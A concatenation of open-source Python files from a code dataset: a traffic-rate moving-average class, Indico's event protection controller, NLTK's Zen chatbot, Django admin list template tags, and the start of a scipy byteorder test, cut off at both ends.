        # Drop the oldest slot so the window length stays SAMPLE_SIZE.
        self._data.pop(0)
        self._data.append(x)
    def get(self):
        """
        Gets the collection.
        """
        return self._data
    def get_average(self):
        """
        Gets the moving average rate in KiB/s.

        Returns 0 when there are not enough samples or no time has
        elapsed between the first and last sample.
        """
        # Materialize the non-empty samples: a plain filter() iterator
        # would be exhausted after the first traversal on Python 3 and
        # the time deltas would always come out empty.
        data = [point for point in self._data if point is not None]
        try:
            first_ts, first_traffic = data[0]
            last_ts, last_traffic = data[-1]
        except IndexError:
            # Not a single sample yet.
            return 0
        deltatraffic = last_traffic - first_traffic
        # total_seconds() keeps fractional seconds and is correct across
        # day boundaries; timedelta.seconds would truncate sub-second
        # windows to 0 and wrap after 24h.
        deltat = (last_ts - first_ts).total_seconds()
        try:
            rate = float(deltatraffic) / float(deltat) / 1024
        except ZeroDivisionError:
            rate = 0
        # In some cases we get negative rates
        if rate < 0:
            rate = 0
        return rate
    def get_total(self):
        """
        Gets the total accumulated throughput in KiB.
        """
        try:
            return self._data[-1][1] / 1024
        except TypeError:
            # Window is still empty (last slot is None).
            return 0
| gpl-3.0 |
eliasdesousa/indico | indico/modules/events/management/controllers/protection.py | 2 | 5129 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from flask import flash, redirect, request
from werkzeug.exceptions import NotFound
from indico.core.db.sqlalchemy.protection import ProtectionMode, render_acl
from indico.modules.events.management.controllers.base import RHManageEventBase
from indico.modules.events.management.forms import EventProtectionForm
from indico.modules.events.management.views import WPEventProtection
from indico.modules.events.operations import update_event_protection
from indico.modules.events.sessions import COORDINATOR_PRIV_SETTINGS, session_settings
from indico.modules.events.sessions.operations import update_session_coordinator_privs
from indico.modules.events.util import get_object_from_args, update_object_principals
from indico.util.i18n import _
from indico.web.flask.util import url_for
from indico.web.forms.base import FormDefaults
from indico.web.util import jsonify_template
class RHShowNonInheriting(RHManageEventBase):
    """Show a list of non-inheriting child objects"""
    def _process_args(self):
        RHManageEventBase._process_args(self)
        # get_object_from_args resolves the target from the request URL;
        # the third element of the returned tuple is the object itself.
        self.obj = get_object_from_args()[2]
        if self.obj is None:
            raise NotFound
    def _process(self):
        objects = self.obj.get_non_inheriting_objects()
        return jsonify_template('events/management/non_inheriting_objects.html', objects=objects)
class RHEventACL(RHManageEventBase):
    """Display the inherited ACL of the event"""
    def _process(self):
        # Rendering is delegated to the shared protection ACL helper.
        return render_acl(self.event)
class RHEventACLMessage(RHManageEventBase):
    """Render the inheriting ACL message"""
    def _process(self):
        # The protection mode arrives as its enum *name* in the query string.
        mode = ProtectionMode[request.args['mode']]
        return jsonify_template('forms/protection_field_acl_message.html', object=self.event, mode=mode,
                                endpoint='event_management.acl')
class RHEventProtection(RHManageEventBase):
    """Show event protection"""
    # Form fields excluded from input sanitization -- presumably because the
    # access key is an opaque secret, not rich text (NOTE(review): confirm
    # against the sanitization middleware).
    NOT_SANITIZED_FIELDS = {'access_key'}
    def _process(self):
        # GET renders the form with current settings; a valid POST applies
        # the changes and redirects back to this page.
        form = EventProtectionForm(obj=FormDefaults(**self._get_defaults()), event=self.event)
        if form.validate_on_submit():
            update_event_protection(self.event, {'protection_mode': form.protection_mode.data,
                                                 'own_no_access_contact': form.own_no_access_contact.data,
                                                 'access_key': form.access_key.data,
                                                 'visibility': form.visibility.data})
            # Sync the three principal lists from the form onto the ACL.
            update_object_principals(self.event, form.acl.data, read_access=True)
            update_object_principals(self.event, form.managers.data, full_access=True)
            update_object_principals(self.event, form.submitters.data, role='submit')
            self._update_session_coordinator_privs(form)
            flash(_('Protection settings have been updated'), 'success')
            return redirect(url_for('.protection', self.event))
        return WPEventProtection.render_template('event_protection.html', self.event, 'protection', form=form)
    def _get_defaults(self):
        # Reconstruct form defaults from the event's ACL entries / settings.
        acl = {p.principal for p in self.event.acl_entries if p.read_access}
        submitters = {p.principal for p in self.event.acl_entries if p.has_management_role('submit', explicit=True)}
        managers = {p.principal for p in self.event.acl_entries if p.full_access}
        registration_managers = {p.principal for p in self.event.acl_entries
                                 if p.has_management_role('registration', explicit=True)}
        event_session_settings = session_settings.get_all(self.event)
        # Only coordinator privileges that are actually enabled become defaults.
        coordinator_privs = {name: event_session_settings[val] for name, val in COORDINATOR_PRIV_SETTINGS.iteritems()
                             if event_session_settings.get(val)}
        return dict({'protection_mode': self.event.protection_mode, 'acl': acl, 'managers': managers,
                     'registration_managers': registration_managers, 'submitters': submitters,
                     'access_key': self.event.access_key, 'visibility': self.event.visibility,
                     'own_no_access_contact': self.event.own_no_access_contact}, **coordinator_privs)
    def _update_session_coordinator_privs(self, form):
        # priv_fields is the set of dynamically generated privilege fields.
        data = {field: getattr(form, field).data for field in form.priv_fields}
        update_session_coordinator_privs(self.event, data)
| gpl-3.0 |
xiaozhuchacha/OpenBottle | grammar_induction/earley_parser/nltk/chat/zen.py | 7 | 9999 | # Natural Language Toolkit: Zen Chatbot
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Amy Holland <amyrh@csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Zen Chatbot talks in gems of Zen wisdom.
This is a sample conversation with Zen Chatbot:
ZC: Welcome, my child.
me: Good afternoon.
ZC: Ask the question you have come to ask.
me: How can I achieve enlightenment?
ZC: How do you suppose?
me: Through meditation.
ZC: Form is emptiness, and emptiness form.
me: How can I empty my mind of worldly troubles?
ZC: Will an answer to that really help in your search for enlightenment?
me: Yes.
ZC: It is better to be right than to be certain.
me: I seek truth and wisdom.
ZC: The search for truth is a long journey.
me: Are you sure?
ZC: Maybe sure, maybe not sure.
The chatbot structure is based on that of chat.eliza. Thus, it uses
a translation table to convert from question to response
i.e. "I am" --> "you are"
Of course, since Zen Chatbot does not understand the meaning of any words,
responses are very limited. Zen Chatbot will usually answer very vaguely, or
respond to a question by asking a different question, in much the same way
as Eliza.
"""
from __future__ import print_function
from nltk.chat.util import Chat, reflections
# responses are matched top to bottom, so non-specific matches occur later
# for each match, a list of possible responses is provided
# responses are matched top to bottom, so non-specific matches occur later
# for each match, a list (tuple) of possible responses is provided
responses = (

    # Zen Chatbot opens with the line "Welcome, my child." The usual
    # response will be a greeting problem: 'good' matches "good morning",
    # "good day" etc, but also "good grief!" and other sentences starting
    # with the word 'good' that may not be a greeting
    (r'(hello(.*))|(good [a-zA-Z]+)',
    ( "The path to enlightenment is often difficult to see.",
      "Greetings. I sense your mind is troubled. Tell me of your troubles.",
      "Ask the question you have come to ask.",
      "Hello. Do you seek enlightenment?")),

    # "I need" and "I want" can be followed by a thing (eg 'help')
    # or an action (eg 'to see you')
    #
    # This is a problem with this style of response -
    # person:  "I need you"
    # chatbot: "me can be achieved by hard work and dedication of the mind"
    # i.e. 'you' is not really a thing that can be mapped this way, so this
    # interpretation only makes sense for some inputs
    #
    (r'i need (.*)',
    ( "%1 can be achieved by hard work and dedication of the mind.",
      "%1 is not a need, but a desire of the mind. Clear your mind of such concerns.",
      "Focus your mind on%1, and you will find what you need.")),

    (r'i want (.*)',
    ( "Desires of the heart will distract you from the path to enlightenment.",
      "Will%1 help you attain enlightenment?",
      "Is%1 a desire of the mind, or of the heart?")),

    # why questions are separated into three types:
    # "why..I"   e.g. "why am I here?" "Why do I like cake?"
    # "why..you" e.g. "why are you here?" "Why won't you tell me?"
    # "why..."   e.g. "Why is the sky blue?"
    # problems:
    #     person:  "Why can't you tell me?"
    #     chatbot: "Are you sure I tell you?"
    #   - this style works for positives (e.g. "why do you like cake?")
    #     but does not work for negatives (e.g. "why don't you like cake?")
    (r'why (.*) i (.*)\?',
    ( "You%1%2?",
      "Perhaps you only think you%1%2")),

    (r'why (.*) you(.*)\?',
    ( "Why%1 you%2?",
      "%2 I%1",
      "Are you sure I%2?")),

    (r'why (.*)\?',
    ( "I cannot tell you why%1.",
      "Why do you think %1?" )),

    # e.g. "are you listening?", "are you a duck"
    (r'are you (.*)\?',
    ( "Maybe%1, maybe not%1.",
      "Whether I am%1 or not is God's business.")),

    # e.g. "am I a duck?", "am I going to die?"
    (r'am i (.*)\?',
    ( "Perhaps%1, perhaps not%1.",
      "Whether you are%1 or not is not for me to say.")),

    # what questions, e.g. "what time is it?"
    # problems:
    #     person:  "What do you want?"
    #     chatbot: "Seek truth, not what do me want."
    (r'what (.*)\?',
    ( "Seek truth, not what%1.",
      "What%1 should not concern you.")),

    # how questions, e.g. "how do you do?"
    (r'how (.*)\?',
    ( "How do you suppose?",
      "Will an answer to that really help in your search for enlightenment?",
      "Ask yourself not how, but why.")),

    # can questions, e.g. "can you run?", "can you come over here please?"
    (r'can you (.*)\?',
    ( "I probably can, but I may not.",
      "Maybe I can%1, and maybe I cannot.",
      "I can do all, and I can do nothing.")),

    # can questions, e.g. "can I have some cake?", "can I know truth?"
    (r'can i (.*)\?',
    ( "You can%1 if you believe you can%1, and have a pure spirit.",
      "Seek truth and you will know if you can%1.")),

    # e.g. "It is raining" - implies the speaker is certain of a fact
    (r'it is (.*)',
    ( "How can you be certain that%1, when you do not even know yourself?",
      "Whether it is%1 or not does not change the way the world is.")),

    # e.g. "is there a doctor in the house?"
    (r'is there (.*)\?',
    ( "There is%1 if you believe there is.",
      "It is possible that there is%1.")),

    # e.g. "is it possible?", "is this true?"
    (r'is(.*)\?',
    ( "%1 is not relevant.",
      "Does this matter?")),

    # non-specific question
    (r'(.*)\?',
    ( "Do you think %1?",
      "You seek the truth. Does the truth seek you?",
      "If you intentionally pursue the answers to your questions, the answers become hard to see.",
      "The answer to your question cannot be told. It must be experienced.")),

    # expression of hate of form "I hate you" or "Kelly hates cheese"
    # NOTE: the verb alternatives must live inside one group; with a bare
    # top-level '|' the alternation split the whole pattern, so inputs like
    # "I dislike cheese" could never match.
    (r'(.*) (hate[s]?|dislike[s]?|don\'t like)(.*)',
    ( "Perhaps it is not about hating %2, but about hate from within.",
      "Weeds only grow when we dislike them",
      "Hate is a very strong emotion.")),

    # statement containing the word 'truth'
    (r'(.*) truth(.*)',
    ( "Seek truth, and truth will seek you.",
      "Remember, it is not the spoon which bends - only yourself.",
      "The search for truth is a long journey.")),

    # desire to do an action
    # e.g. "I want to go shopping"
    (r'i want to (.*)',
    ( "You may %1 if your heart truly desires to.",
      "You may have to %1.")),

    # desire for an object
    # e.g. "I want a pony"
    # NOTE: unreachable in practice -- the earlier, identical 'i want (.*)'
    # pattern always matches first; kept for fidelity with the original table.
    (r'i want (.*)',
    ( "Does your heart truly desire %1?",
      "Is this a desire of the heart, or of the mind?")),

    # e.g. "I can't wait" or "I can't do this"
    (r'i can\'t (.*)',
    ( "What we can and can't do is a limitation of the mind.",
      "There are limitations of the body, and limitations of the mind.",
      "Have you tried to%1 with a clear mind?")),

    # "I think.." indicates uncertainty. e.g. "I think so."
    # problem: exceptions...
    # e.g. "I think, therefore I am"
    (r'i think (.*)',
    ( "Uncertainty in an uncertain world.",
      "Indeed, how can we be certain of anything in such uncertain times.",
      "Are you not, in fact, certain that%1?")),

    # "I feel...emotions/sick/light-headed..."
    (r'i feel (.*)',
    ( "Your body and your emotions are both symptoms of your mind.",
      "What do you believe is the root of such feelings?",
      "Feeling%1 can be a sign of your state-of-mind.")),

    # exclamation mark indicating emotion
    # e.g. "Wow!" or "No!"
    (r'(.*)!',
    ( "I sense that you are feeling emotional today.",
      "You need to calm your emotions.")),

    # because [statement]
    # e.g. "because I said so"
    (r'because (.*)',
    ( "Does knowing the reasons behind things help you to understand"
      " the things themselves?",
      "If%1, what else must be true?")),

    # yes or no - raise an issue of certainty/correctness
    (r'(yes)|(no)',
    ( "Is there certainty in an uncertain world?",
      "It is better to be right than to be certain.")),

    # sentence containing word 'love'
    (r'(.*)love(.*)',
    ( "Think of the trees: they let the birds perch and fly with no intention to call them when they come, and no longing for their return when they fly away. Let your heart be like the trees.",
      "Free love!")),

    # sentence containing word 'understand' - r
    (r'(.*)understand(.*)',
    ( "If you understand, things are just as they are;"
      " if you do not understand, things are just as they are.",
      "Imagination is more important than knowledge.")),

    # 'I', 'me', 'my' - person is talking about themself.
    # this breaks down when words contain these - eg 'Thyme', 'Irish'
    # NOTE: the alternatives are wrapped in one group so the alternation does
    # not split the pattern itself (same fix as the hate/dislike rule above).
    (r'(.*)((me )|( me)|(my)|(mine)|(i))(.*)',
    ( "'I', 'me', 'my'... these are selfish expressions.",
      "Have you ever considered that you might be a selfish person?",
      "Try to consider others, not just yourself.",
      "Think not just of yourself, but of others.")),

    # 'you' starting a sentence
    # e.g. "you stink!"
    (r'you (.*)',
    ( "My path is not of concern to you.",
      "I am but one, and you but one more.")),

    # say goodbye with some extra Zen wisdom.
    (r'exit',
    ( "Farewell. The obstacle is the path.",
      "Farewell. Life is a journey, not a destination.",
      "Good bye. We are cups, constantly and quietly being filled."
      "\nThe trick is knowing how to tip ourselves over and let the beautiful stuff out.")),

    # fall through case -
    # when stumped, respond with generic zen wisdom
    #
    (r'(.*)',
    ( "When you're enlightened, every word is wisdom.",
      "Random talk is useless.",
      "The reverse side also has a reverse side.",
      "Form is emptiness, and emptiness is form.",
      "I pour out a cup of water. Is the cup empty?"))
)
zen_chatbot = Chat(responses, reflections)
def zen_chat():
    """Print the Zen Chatbot banner and start an interactive session."""
    banner = '*' * 75
    print(banner)
    print("Zen Chatbot!".center(75))
    print(banner)
    print('"Look beyond mere words and letters - look into your mind"'.center(75))
    print("* Talk your way to truth with Zen Chatbot.")
    print("* Type 'quit' when you have had enough.")
    print(banner)
    print("Welcome, my child.")

    zen_chatbot.converse()
def demo():
    # Entry point for the interactive demo; simply runs the chat loop.
    zen_chat()

if __name__ == "__main__":
    demo()
| mit |
ericfc/django | django/contrib/admin/templatetags/admin_list.py | 127 | 17279 | from __future__ import unicode_literals
import datetime
from django.contrib.admin.templatetags.admin_static import static
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
display_for_field, display_for_value, label_for_field, lookup_field,
)
from django.contrib.admin.views.main import (
ALL_VAR, ORDER_VAR, PAGE_VAR, SEARCH_VAR,
)
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.template import Library
from django.template.loader import get_template
from django.utils import formats
from django.utils.encoding import force_text
from django.utils.html import escapejs, format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
# Template-tag library; all tags/inclusion tags below register on it.
register = Library()

# Placeholder for elided page numbers in the smart pagination output.
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
    """
    Generates an individual page index link in a paginated list.
    """
    if i == DOT:
        # Elided range marker: render literal dots, no link.
        return '... '
    if i == cl.page_num:
        # Current page: plain highlighted span (page numbers shown 1-based).
        return format_html('<span class="this-page">{}</span> ', i + 1)
    # Any other page: link carrying the page query parameter; the last page
    # gets a special "end" CSS class.
    end_class = ' class="end"' if i == cl.paginator.num_pages - 1 else ''
    return format_html(
        '<a href="{}"{}>{}</a> ',
        cl.get_query_string({PAGE_VAR: i}),
        mark_safe(end_class),
        i + 1,
    )
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
    """
    Generates the series of links to the pages in a paginated list.

    Returns the context for admin/pagination.html: the changelist, whether
    pagination is needed, the "show all" URL (or a falsy value when that link
    should not be shown), and the list of zero-based page indices to render
    (with DOT entries marking elided ranges).
    """
    paginator, page_num = cl.paginator, cl.page_num
    # Pagination is skipped when everything already fits on one page, or when
    # the user asked for (and is allowed) the full un-paginated list.
    pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
    if not pagination_required:
        page_range = []
    else:
        ON_EACH_SIDE = 3  # pages shown on each side of the current page
        ON_ENDS = 2       # pages always shown at the very start/end
        # If there are 10 or fewer pages, display links to every page.
        # Otherwise, do some fancy
        if paginator.num_pages <= 10:
            page_range = range(paginator.num_pages)
        else:
            # Insert "smart" pagination links, so that there are always ON_ENDS
            # links at either end of the list of pages, and there are always
            # ON_EACH_SIDE links at either end of the "current page" link.
            page_range = []
            if page_num > (ON_EACH_SIDE + ON_ENDS):
                # Leading pages, a DOT gap, then the window before the current page.
                page_range.extend(range(0, ON_ENDS))
                page_range.append(DOT)
                page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
            else:
                # Current page is near the start: no leading gap needed.
                page_range.extend(range(0, page_num + 1))
            if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
                # Window after the current page, a DOT gap, then trailing pages.
                page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
                page_range.append(DOT)
                page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
            else:
                # Current page is near the end: no trailing gap needed.
                page_range.extend(range(page_num + 1, paginator.num_pages))
    need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
    return {
        'cl': cl,
        'pagination_required': pagination_required,
        # Falsy (False) when the link is not needed; the template relies on that.
        'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
        'page_range': page_range,
        'ALL_VAR': ALL_VAR,
        # NOTE(review): literal '1' key looks vestigial -- templates cannot
        # reference it by name; kept for backward compatibility.
        '1': 1,
    }
def result_headers(cl):
    """
    Generates the list column headers.

    Yields one dict per column in ``cl.list_display`` with the header text,
    sortability flags, CSS class attribute and (for sortable columns) the
    URLs for making the column the primary sort, removing it from the sort,
    and toggling its direction.
    """
    ordering_field_columns = cl.get_ordering_field_columns()

    def make_qs_param(t, n):
        # Encode one ordering entry for ORDER_VAR: the column index,
        # prefixed with '-' when the direction is descending.
        return ('-' if t == 'desc' else '') + str(n)

    for i, field_name in enumerate(cl.list_display):
        text, attr = label_for_field(
            field_name, cl.model,
            model_admin=cl.model_admin,
            return_attr=True
        )
        if attr:
            # Potentially not sortable

            # if the field is the action checkbox: no sorting and special class
            if field_name == 'action_checkbox':
                yield {
                    "text": text,
                    "class_attrib": mark_safe(' class="action-checkbox-column"'),
                    "sortable": False,
                }
                continue

            admin_order_field = getattr(attr, "admin_order_field", None)
            if not admin_order_field:
                # Not sortable
                yield {
                    "text": text,
                    "class_attrib": format_html(' class="column-{}"', field_name),
                    "sortable": False,
                }
                continue

        # OK, it is sortable if we got this far
        th_classes = ['sortable', 'column-{}'.format(field_name)]
        order_type = ''
        new_order_type = 'asc'
        sort_priority = 0
        is_sorted = False
        # Is it currently being sorted on?
        if i in ordering_field_columns:
            is_sorted = True
            order_type = ordering_field_columns.get(i).lower()
            sort_priority = list(ordering_field_columns).index(i) + 1
            th_classes.append('sorted %sending' % order_type)
            # Clicking an already-sorted column toggles its direction.
            new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]

        # build new ordering param
        o_list_primary = []  # URL for making this field the primary sort
        o_list_remove = []  # URL for removing this field from sort
        o_list_toggle = []  # URL for toggling order type for this field

        for j, ot in ordering_field_columns.items():
            if j == i:  # Same column
                param = make_qs_param(new_order_type, j)
                # We want clicking on this header to bring the ordering to the
                # front
                o_list_primary.insert(0, param)
                o_list_toggle.append(param)
                # o_list_remove - omit
            else:
                param = make_qs_param(ot, j)
                o_list_primary.append(param)
                o_list_toggle.append(param)
                o_list_remove.append(param)

        if i not in ordering_field_columns:
            # Column not currently sorted: clicking makes it the primary sort.
            o_list_primary.insert(0, make_qs_param(new_order_type, i))

        yield {
            "text": text,
            "sortable": True,
            "sorted": is_sorted,
            "ascending": order_type == "asc",
            "sort_priority": sort_priority,
            "url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
            "url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
            "url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
            "class_attrib": format_html(' class="{}"', ' '.join(th_classes)) if th_classes else '',
        }
def _boolean_icon(field_val):
    """Return an <img> tag showing the yes/no/unknown admin icon for *field_val*."""
    icon_name = {True: 'yes', False: 'no', None: 'unknown'}[field_val]
    icon_url = static('admin/img/icon-%s.gif' % icon_name)
    return format_html('<img src="{}" alt="{}" />', icon_url, field_val)
def items_for_result(cl, result, form):
    """
    Generates the actual list of data.

    Yields one <th>/<td> HTML fragment per column of ``cl.list_display`` for
    the given *result* row, linking the first (or configured) columns to the
    row's change view and rendering editable columns from *form*.
    """

    def link_in_col(is_first, field_name, cl):
        # Should this column's value be wrapped in a change-view link?
        if cl.list_display_links is None:
            return False
        if is_first and not cl.list_display_links:
            return True
        return field_name in cl.list_display_links

    first = True
    pk = cl.lookup_opts.pk.attname
    for field_name in cl.list_display:
        empty_value_display = cl.model_admin.get_empty_value_display()
        row_classes = ['field-%s' % field_name]
        try:
            f, attr, value = lookup_field(field_name, result, cl.model_admin)
        except ObjectDoesNotExist:
            result_repr = empty_value_display
        else:
            empty_value_display = getattr(attr, 'empty_value_display', empty_value_display)
            if f is None or f.auto_created:
                if field_name == 'action_checkbox':
                    row_classes = ['action-checkbox']
                allow_tags = getattr(attr, 'allow_tags', False)
                boolean = getattr(attr, 'boolean', False)
                if boolean or not value:
                    allow_tags = True
                result_repr = display_for_value(value, empty_value_display, boolean)
                # Strip HTML tags in the resulting text, except if the
                # function has an "allow_tags" attribute set to True.
                if allow_tags:
                    result_repr = mark_safe(result_repr)
                if isinstance(value, (datetime.date, datetime.time)):
                    row_classes.append('nowrap')
            else:
                if isinstance(f.remote_field, models.ManyToOneRel):
                    field_val = getattr(result, f.name)
                    if field_val is None:
                        result_repr = empty_value_display
                    else:
                        result_repr = field_val
                else:
                    result_repr = display_for_field(value, f, empty_value_display)
                if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
                    row_classes.append('nowrap')
        if force_text(result_repr) == '':
            # Non-breaking space keeps empty table cells from collapsing.
            # (Restored '&nbsp;' entity, which had been mangled to a bare
            # space by HTML-entity decoding.)
            result_repr = mark_safe('&nbsp;')
        row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
        # If list_display_links not defined, add the link tag to the first field
        if link_in_col(first, field_name, cl):
            table_tag = 'th' if first else 'td'
            first = False

            # Display link to the result's change_view if the url exists, else
            # display just the result's representation.
            try:
                url = cl.url_for_result(result)
            except NoReverseMatch:
                link_or_text = result_repr
            else:
                url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
                # Convert the pk to something that can be used in Javascript.
                # Problem cases are long ints (23L) and non-ASCII strings.
                if cl.to_field:
                    attr = str(cl.to_field)
                else:
                    attr = pk
                value = result.serializable_value(attr)
                result_id = escapejs(value)
                # The onclick handler quotes the id with '&#39;' entities.
                # (Restored from the mangled "''{}'" text, which was not even
                # valid Python.)
                link_or_text = format_html(
                    '<a href="{}"{}>{}</a>',
                    url,
                    format_html(
                        ' onclick="opener.dismissRelatedLookupPopup(window, '
                        '&#39;{}&#39;); return false;"', result_id
                    ) if cl.is_popup else '',
                    result_repr)

            yield format_html('<{}{}>{}</{}>',
                              table_tag,
                              row_class,
                              link_or_text,
                              table_tag)
        else:
            # By default the fields come from ModelAdmin.list_editable, but if we pull
            # the fields out of the form instead of list_editable custom admins
            # can provide fields on a per request basis
            if (form and field_name in form.fields and not (
                    field_name == cl.model._meta.pk.name and
                    form[cl.model._meta.pk.name].is_hidden)):
                bf = form[field_name]
                result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
            yield format_html('<td{}>{}</td>', row_class, result_repr)
    if form and not form[cl.model._meta.pk.name].is_hidden:
        yield format_html('<td>{}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
    """
    List of rendered cells for a single changelist row.

    Wrapper class used to return items in a list_editable changelist,
    annotated with the form object for error reporting purposes. Needed to
    maintain backwards compatibility with existing admin templates.
    """

    def __init__(self, form, *items):
        super(ResultList, self).__init__(*items)
        self.form = form
def results(cl):
    """Yield one ResultList per row; rows are paired with formset forms when editing."""
    if cl.formset:
        for res, form in zip(cl.result_list, cl.formset.forms):
            yield ResultList(form, items_for_result(cl, res, form))
        return
    for res in cl.result_list:
        yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
    """Yield the rendered hidden pk input for each row whose pk field is hidden."""
    if not cl.formset:
        return
    pk_name = cl.model._meta.pk.name
    for res, form in zip(cl.result_list, cl.formset.forms):
        bound_pk = form[pk_name]
        if bound_pk.is_hidden:
            yield mark_safe(force_text(bound_pk))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
    """
    Displays the date hierarchy for date drill-down functionality.

    Depending on which of the year/month/day query parameters are present,
    returns template context with a "back" link one level up and "choices"
    one level down. Returns None (renders nothing) when the changelist has
    no ``date_hierarchy`` configured.
    """
    if cl.date_hierarchy:
        field_name = cl.date_hierarchy
        field = cl.opts.get_field(field_name)
        # DateTimeFields need queryset.datetimes(); plain DateFields use .dates().
        dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
        year_field = '%s__year' % field_name
        month_field = '%s__month' % field_name
        day_field = '%s__day' % field_name
        field_generic = '%s__' % field_name
        year_lookup = cl.params.get(year_field)
        month_lookup = cl.params.get(month_field)
        day_lookup = cl.params.get(day_field)

        def link(filters):
            # Build a changelist URL with *filters* applied, dropping any
            # existing lookups on the hierarchy field.
            return cl.get_query_string(filters, [field_generic])

        if not (year_lookup or month_lookup or day_lookup):
            # select appropriate start level: if all results fall in one year
            # (or one month), start the drill-down there instead of at "all".
            date_range = cl.queryset.aggregate(first=models.Min(field_name),
                                               last=models.Max(field_name))
            if date_range['first'] and date_range['last']:
                if date_range['first'].year == date_range['last'].year:
                    year_lookup = date_range['first'].year
                    if date_range['first'].month == date_range['last'].month:
                        month_lookup = date_range['first'].month

        if year_lookup and month_lookup and day_lookup:
            # Fully drilled down to a single day: no further choices.
            day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
            return {
                'show': True,
                'back': {
                    'link': link({year_field: year_lookup, month_field: month_lookup}),
                    'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
                },
                'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
            }
        elif year_lookup and month_lookup:
            # Month selected: offer the days that actually have results.
            days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
            days = getattr(days, dates_or_datetimes)(field_name, 'day')
            return {
                'show': True,
                'back': {
                    'link': link({year_field: year_lookup}),
                    'title': str(year_lookup)
                },
                'choices': [{
                    'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
                    'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
                } for day in days]
            }
        elif year_lookup:
            # Year selected: offer the months that actually have results.
            months = cl.queryset.filter(**{year_field: year_lookup})
            months = getattr(months, dates_or_datetimes)(field_name, 'month')
            return {
                'show': True,
                'back': {
                    'link': link({}),
                    'title': _('All dates')
                },
                'choices': [{
                    'link': link({year_field: year_lookup, month_field: month.month}),
                    'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
                } for month in months]
            }
        else:
            # Nothing selected: offer all years that have results.
            years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
            return {
                'show': True,
                'choices': [{
                    'link': link({year_field: str(year.year)}),
                    'title': str(year.year),
                } for year in years]
            }
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
    """
    Displays a search form for searching the list.
    """
    # Only show the result count when the list is filtered down from the
    # full, unfiltered count.
    filtered = cl.result_count != cl.full_result_count
    return {
        'cl': cl,
        'search_var': SEARCH_VAR,
        'show_result_count': filtered,
    }
@register.simple_tag
def admin_list_filter(cl, spec):
    """Render one sidebar filter using the template named by *spec*."""
    template = get_template(spec.template)
    context = {
        'title': spec.title,
        'choices': list(spec.choices(cl)),
        'spec': spec,
    }
    return template.render(context)
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
    """
    Track the number of times the action field has been rendered on the page,
    so we know which value to use.
    """
    previous_index = context.get('action_index', -1)
    context['action_index'] = previous_index + 1
    return context
| bsd-3-clause |
njwilson23/scipy | scipy/io/matlab/tests/test_byteordercodes.py | 126 | 1044 | ''' Tests for byteorder module '''
from __future__ import division, print_function, absolute_import
import sys
from numpy.testing import assert_raises, assert_, run_module_suite
import scipy.io.matlab.byteordercodes as sibc
def test_native():
    # sys_is_le must agree with the byte order reported by the interpreter.
    expected = (sys.byteorder == 'little')
    assert_(sibc.sys_is_le == expected)
def test_to_numpy():
    # 'native' and 'swapped' resolve according to the host byte order.
    if sys.byteorder == 'little':
        native_code, swapped_code = '<', '>'
    else:
        native_code, swapped_code = '>', '<'
    assert_(sibc.to_numpy_code('native') == native_code)
    assert_(sibc.to_numpy_code('swapped') == swapped_code)
    assert_(sibc.to_numpy_code('native') == sibc.to_numpy_code('='))
    assert_(sibc.to_numpy_code('big') == '>')
    # All spellings of little- and big-endian map to '<' and '>'.
    for code in ('little', '<', 'l', 'L', 'le'):
        assert_(sibc.to_numpy_code(code) == '<')
    for code in ('big', '>', 'b', 'B', 'be'):
